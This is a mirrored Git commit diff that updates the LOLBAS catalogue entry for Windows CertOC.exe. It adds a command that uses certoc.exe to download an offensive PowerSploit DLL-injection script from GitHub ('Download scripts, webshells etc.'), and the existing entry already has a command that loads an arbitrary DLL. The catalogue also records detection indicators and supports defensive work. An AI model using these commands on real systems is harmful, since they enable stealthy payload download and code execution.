mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
Update Certoc.yml (#168)
Co-authored-by: Wietze <wietze@users.noreply.github.com>
This commit is contained in:
parent
5db35bb397
commit
97f5042a58
@ -2,7 +2,7 @@
|
|||||||
Name: CertOC.exe
|
Name: CertOC.exe
|
||||||
Description: Used for installing certificates
|
Description: Used for installing certificates
|
||||||
Author: 'Ensar Samil'
|
Author: 'Ensar Samil'
|
||||||
Created: '2021-10-07'
|
Created: 2021-10-07
|
||||||
Commands:
|
Commands:
|
||||||
- Command: certoc.exe -LoadDLL "C:\test\calc.dll"
|
- Command: certoc.exe -LoadDLL "C:\test\calc.dll"
|
||||||
Description: Loads the target DLL file
|
Description: Loads the target DLL file
|
||||||
@ -10,7 +10,15 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
|
OperatingSystem: Windows Server 2022
|
||||||
|
- Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
|
||||||
|
Description: Downloads text formatted files
|
||||||
|
Usecase: Download scripts, webshells etc.
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1105/
|
||||||
OperatingSystem: Windows Server 2022
|
OperatingSystem: Windows Server 2022
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\certoc.exe
|
- Path: c:\windows\system32\certoc.exe
|
||||||
@ -20,8 +28,10 @@ Code_Sample:
|
|||||||
Detection:
|
Detection:
|
||||||
- IOC: Process creation with given parameter
|
- IOC: Process creation with given parameter
|
||||||
- IOC: Unsigned DLL load via certoc.exe
|
- IOC: Unsigned DLL load via certoc.exe
|
||||||
|
- IOC: Network connection via certoc.exe
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20
|
- Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20
|
||||||
|
- Link: https://twitter.com/sblmsrsn/status/1452941226198671363?s=20
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Ensar Samil
|
- Person: Ensar Samil
|
||||||
Handle: '@sblmsrsn'
|
Handle: '@sblmsrsn'
|
||||||
|
Loading…
Reference in New Issue
Block a user